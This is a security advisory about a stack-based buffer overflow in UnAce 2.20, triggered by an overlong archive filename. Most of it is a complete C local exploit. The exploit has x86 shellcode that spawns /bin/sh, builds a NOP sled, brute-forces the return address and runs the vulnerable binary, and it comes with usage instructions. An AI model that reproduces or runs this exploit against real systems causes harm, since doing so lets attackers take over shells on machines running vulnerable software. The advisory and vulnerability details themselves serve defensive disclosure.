UnAce 2.20 Exploitable Stack-Based Overflow (exploit code)
UnAce 2.20 Exploitable Stack-Based Overflow
--------------------------------------------------------------------
SUMMARY
UnAce has been reported to be prone to a buffer overflow vulnerability.
The issue presents itself when UnAce handles ace filenames that are
of excessive lenght. When this filename is passed to the UnAce utility
as an argument, the string is copied into a reserved buffer in memory.
Data that exceeds the size of the reserved buffer will overflow its bounds
and will trample any saved data that is adjacent to the affected buffer.
Ultimately this may lead to the execution of arbitrary instructions in
the context of the user who is running UnAce. For further informations,
please read the related advisory here [1].
DETAILS
Vulnerable systems:
* UnAce v2.20 (current version)
EXPLOIT
/*Local exploit for unace v2.2 by Li0n7
*Bug reported by Andreas Constantinides <megahz@xxxxxxxxxx>
*contact me: Li0n7@xxxxxxxx
*visit us: ioc.fr.st
*tested on slackware 9.0
*usage: ./unace-exp[-r <RET>][-b [-s <STARTING_RET>][-d <DIFF>]]
*-r <RET>: try to exploit unace with specified <RET> as return address
*-b: enables bruteforcing
*-s: specify the first address to bruteforce
*-d: the value to take away from the starting address at each
bruteforcing iteration
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <errno.h>
#define BSIZE 600
#define SIZE BSIZE*2
#define D_DIFF 1
#define D_START 0xbfffffff
#define PATH "/tmp/test/exploits/src/unace"
#define RET 0xbffff73a
char shellcode[]=
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
char *buffer,*ptr;
void exec_culn();
int tease();
int make_string(long ret_addr);
int bruteforce(long start,int diff);
void banner(char *argv0);
int
main(int argc,char *argv[])
{
char * option_list = "bd:r:s:";
int option,brute = 0,opterr = 0,diff = D_DIFF;
long ret,start = D_START;
banner(argv[0]);
if (argc < 1) exit(-1);
while((option = getopt(argc,argv,option_list)) != -1)
switch(option)
{
case 'b':
brute = 1;
break;
case 'd':
diff = atoi(optarg);
break;
case 'r':
ret = strtoul(optarg,NULL,0);
make_string(ret);
tease();
exit(0);
break;
case 's':
start = strtoul(optarg,NULL,0);
break;
case '?':
fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
banner(argv[0]);
exit(-1);
}
if(brute == 1)
bruteforce(start,diff);
return 0;
}
void
exec_vuln()
{
execl(PATH,PATH,"e",buffer,NULL);
}
int
tease()
{
pid_t pid;
pid_t wpid;
int status;
pid = fork();
if ( pid == -1 ) {
fprintf(stderr, " [-] %s: Failed to fork()\n", strerror(errno));
exit(13);
} else if ( pid == 0 ) {
exec_vuln();
} else {
wpid = wait(&status);
if ( wpid == -1 ) {
fprintf(stderr,"[-] %s: wait()\n", strerror(errno));
return 1;
} else if ( wpid != pid )
abort();
else {
if ( WIFEXITED(status) ) {
printf("[+] Exited: shell's ret code = %d\n",
WEXITSTATUS(status));
return WEXITSTATUS(status);
} else if ( WIFSIGNALED(status) ) {
return WTERMSIG(status);
} else {
fprintf(stderr, "[-] Stopped.\n");
}
}
}
return 1;
}
int
make_string(long ret_addr)
{
int i;
long ret,addr,*addr_ptr;
buffer = (char *)malloc(SIZE);
if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory, exiting...\n");
exit(-1);
}
ptr = buffer;
memset(ptr,0x90,BSIZE-strlen(shellcode));
ptr += BSIZE-strlen(shellcode);
for(i=0;i<strlen(shellcode);i++)
*ptr++ = shellcode[i];
addr_ptr = (long *)ptr;
for(i=0;i<100;i++)
*(addr_ptr++) = ret_addr;
ptr = (char *)addr_ptr;
*ptr = 0;
return 0;
}
int
bruteforce(long start,int diff)
{
int ret;
long i;
fprintf(stdout,"[+] Starting bruteforcing...\n");
for(i=start;i<0;i=i-diff)
{
fprintf(stdout,"[+] Testing 0x%x...\n",i);
make_string(i);
ret=tease();
if(ret==0)
{
fprintf(stdout,"[+] Ret address found: 0x%x\n",i);
break;
}
}
return 0;
}
void
banner(char *argv0)
{
fprintf(stderr,"\n local exploit for unace v <= 2.2 by Li0n7\n");
fprintf(stderr," vulnerability reported by Andreas Constantinides
<megahz@xxxxxxxxxx>\n");
fprintf(stderr," visit us: http://www.ioc.fr.st\n");
fprintf(stderr," contact me: Li0n7[at]voila[dot]fr\n");
fprintf(stderr," usage: %s [-r <RET>][-b [-s <STARTING_RET>][-d
<DIFF>]]\n\n",argv0);
}
CREDITS
Vulnerability reported by Andreas Constantinides <megahz@xxxxxxxxxx>
REFERENCES
[1] http://www.securityfocus.com/archive/1/344065